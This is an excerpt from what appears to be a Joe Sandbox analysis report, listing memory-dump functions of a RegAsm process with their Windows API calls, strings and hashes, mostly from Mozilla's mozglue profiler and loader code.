                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                        • Instruction ID: 38d752a9143138f86ac685898b8d67295e06892267e550e03b78a35cf96c5f13
                                                                                                                                                        • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                        • Instruction Fuzzy Hash: 6B222871E04629CFDB14CF98C890AADF7B2FF89304F549259C54AAB705D731A986CF84
                                                                                                                                                        Function 6C67AC00 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c3e655f09681c35ad21d4aa2250e9dc9f232b0d0547cfc1a819b100b8dd69f89
                                                                                                                                                        • Instruction ID: 411de7c2c2b6a94c37449b433308116831dbcb2e332adcbe43e8279d8dfb34a1
                                                                                                                                                        • Opcode Fuzzy Hash: c3e655f09681c35ad21d4aa2250e9dc9f232b0d0547cfc1a819b100b8dd69f89
                                                                                                                                                        • Instruction Fuzzy Hash: D7F15A726087458FD710CE28C8907ABB7E2AFC6318F149E2DE4D4877C2E774D88587A6
                                                                                                                                                        Function 6C60C670 Relevance: .3, Instructions: 285COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                                                                        • Instruction ID: fc17c243c89a52650d84ebd3dc5a545307961b65d06190fbafa91f3bbe1491f7
                                                                                                                                                        • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                                                                                                        • Instruction Fuzzy Hash: EDA1B171F0061A9BDB08CE68C8913AEB7F2AFC9354F188129D916F7781D7749C068BE5
                                                                                                                                                        Function 6C6655F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(user32,?,6C63E1A5), ref: 6C665606
                                                                                                                                                        • LoadLibraryW.KERNEL32(gdi32,?,6C63E1A5), ref: 6C66560F
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C665633
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C66563D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C66566C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C66567D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C665696
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6656B2
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6656CB
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6656E4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6656FD
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C665716
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C66572F
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C665748
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C665761
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C66577A
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C665793
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6657A8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6657BD
                                                                                                                                                        • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6657D5
                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6657EA
                                                                                                                                                        • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6657FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                        • API String ID: 2238633743-1964193996
                                                                                                                                                        • Opcode ID: d05adb70c8c5c2cf0475499fb2d3b9e783f2867339524bafa724a0f1872980be
                                                                                                                                                        • Instruction ID: 9c65db99792f6e79f248195d79cd3eb6e1f18b0615515b298ab7d109094cd275
                                                                                                                                                        • Opcode Fuzzy Hash: d05adb70c8c5c2cf0475499fb2d3b9e783f2867339524bafa724a0f1872980be
                                                                                                                                                        • Instruction Fuzzy Hash: D851F170613713BFDB115F378D999263AB8AB57385B104829EA21E2E52DB74C801CF7E
                                                                                                                                                        Function 6C64CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C61582D), ref: 6C64CC27
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C61582D), ref: 6C64CC3D
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C67FE98,?,?,?,?,?,6C61582D), ref: 6C64CC56
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C61582D), ref: 6C64CC6C
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C61582D), ref: 6C64CC82
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C61582D), ref: 6C64CC98
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C61582D), ref: 6C64CCAE
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C64CCC4
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C64CCDA
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C64CCEC
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C64CCFE
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C64CD14
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C64CD82
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C64CD98
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C64CDAE
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C64CDC4
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C64CDDA
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C64CDF0
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C64CE06
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C64CE1C
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C64CE32
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C64CE48
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C64CE5E
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C64CE74
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C64CE8A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strcmp
                                                                                                                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                        • API String ID: 1004003707-2809817890
                                                                                                                                                        • Opcode ID: 7b22d09c2f0a5d149241685761c2d42bb5f76817abafc4821fe28df2d948f6eb
                                                                                                                                                        • Instruction ID: 8f09e6bd4816217b8769e23d4a7fcd4f2b2ffa0cdf0eaa18e37cfdef6423d1f9
                                                                                                                                                        • Opcode Fuzzy Hash: 7b22d09c2f0a5d149241685761c2d42bb5f76817abafc4821fe28df2d948f6eb
                                                                                                                                                        • Instruction Fuzzy Hash: 545134D1A4662571FB1431256D21BEA3485EF5325AF10C835EE17A1F80FB05960ECABF
                                                                                                                                                        Function 6C614470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C614730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6144B2,6C68E21C,6C68F7F8), ref: 6C61473E
                                                                                                                                                          • Part of subcall function 6C614730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C61474A
                                                                                                                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6144BA
                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6144D2
                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C68F80C,6C60F240,?,?), ref: 6C61451A
                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C61455C
                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 6C614592
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C68F770), ref: 6C6145A2
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C6145AA
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C6145BB
                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C68F818,6C60F240,?,?), ref: 6C614612
                                                                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C614636
                                                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C614644
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C61466D
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C61469F
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146AB
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146B2
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146B9
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146C0
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6146CD
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C6146F1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6146FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                        • String ID: Ghl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                        • API String ID: 1702738223-1697825190
                                                                                                                                                        • Opcode ID: 57e494da0f094402da4492d4c287b15640b2567bfc2ea795833e4bcefda82464
                                                                                                                                                        • Instruction ID: 4d67c582b539b8c2998a5596f37f6c7f27f0cd6f4cd2e883db706734afbf2ed2
                                                                                                                                                        • Opcode Fuzzy Hash: 57e494da0f094402da4492d4c287b15640b2567bfc2ea795833e4bcefda82464
                                                                                                                                                        • Instruction Fuzzy Hash: 116106B060A244BFEB008F66CC89BA577B8EB8734DF148458E5049BA41D7F19545CFBE
                                                                                                                                                        Function 6C64F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F70E
                                                                                                                                                        • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C64F8F9
                                                                                                                                                          • Part of subcall function 6C616390: GetCurrentThreadId.KERNEL32 ref: 6C6163D0
                                                                                                                                                          • Part of subcall function 6C616390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6163DF
                                                                                                                                                          • Part of subcall function 6C616390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C61640E
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F93A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F98A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F990
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F994
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F716
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                          • Part of subcall function 6C60B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C60B5E0
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F739
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F746
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F793
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C68385B,00000002,?,?,?,?,?), ref: 6C64F829
                                                                                                                                                        • free.MOZGLUE(?,?,00000000,?), ref: 6C64F84C
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C64F866
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64FA0C
                                                                                                                                                          • Part of subcall function 6C615E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C615E8C
                                                                                                                                                          • Part of subcall function 6C615E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615E9D
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentThreadId.KERNEL32 ref: 6C615EAB
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentThreadId.KERNEL32 ref: 6C615EB8
                                                                                                                                                          • Part of subcall function 6C615E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615ECF
                                                                                                                                                          • Part of subcall function 6C615E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C615F27
                                                                                                                                                          • Part of subcall function 6C615E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C615F47
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentProcess.KERNEL32 ref: 6C615F53
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentThread.KERNEL32 ref: 6C615F5C
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentProcess.KERNEL32 ref: 6C615F66
                                                                                                                                                          • Part of subcall function 6C615E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C615F7E
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64F9C5
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64F9DA
                                                                                                                                                        Strings
                                                                                                                                                        • " attempted to re-register as ", xrefs: 6C64F858
                                                                                                                                                        • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C64F9A6
                                                                                                                                                        • [D %d/%d] profiler_register_thread(%s), xrefs: 6C64F71F
                                                                                                                                                        • Thread , xrefs: 6C64F789
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                        • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                        • API String ID: 882766088-1834255612
                                                                                                                                                        • Opcode ID: 615947939281b75202b3ec2460df6c8628033a2be0064cd5bfb7d7db37454c11
                                                                                                                                                        • Instruction ID: d19e5019abd572985766ff6b75d74a469f59f45d7d56e6d92eec387f5e8073c0
                                                                                                                                                        • Opcode Fuzzy Hash: 615947939281b75202b3ec2460df6c8628033a2be0064cd5bfb7d7db37454c11
                                                                                                                                                        • Instruction Fuzzy Hash: 7D810671A05200AFD710DF25C880AAAB7B5EFC6308F55C56DE8459BB51EB30D849CBAF
                                                                                                                                                        Function 6C64EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EE60
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EE6D
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EE92
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C64EEA5
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C64EEB4
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C64EEBB
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EEC7
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64EECF
                                                                                                                                                          • Part of subcall function 6C64DE60: GetCurrentThreadId.KERNEL32 ref: 6C64DE73
                                                                                                                                                          • Part of subcall function 6C64DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C614A68), ref: 6C64DE7B
                                                                                                                                                          • Part of subcall function 6C64DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C614A68), ref: 6C64DEB8
                                                                                                                                                          • Part of subcall function 6C64DE60: free.MOZGLUE(00000000,?,6C614A68), ref: 6C64DEFE
                                                                                                                                                          • Part of subcall function 6C64DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C64DF38
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EF1E
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EF2B
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EF59
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EFB0
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EFBD
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EFE1
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EFF8
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F000
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C64F02F
                                                                                                                                                          • Part of subcall function 6C64F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C64F09B
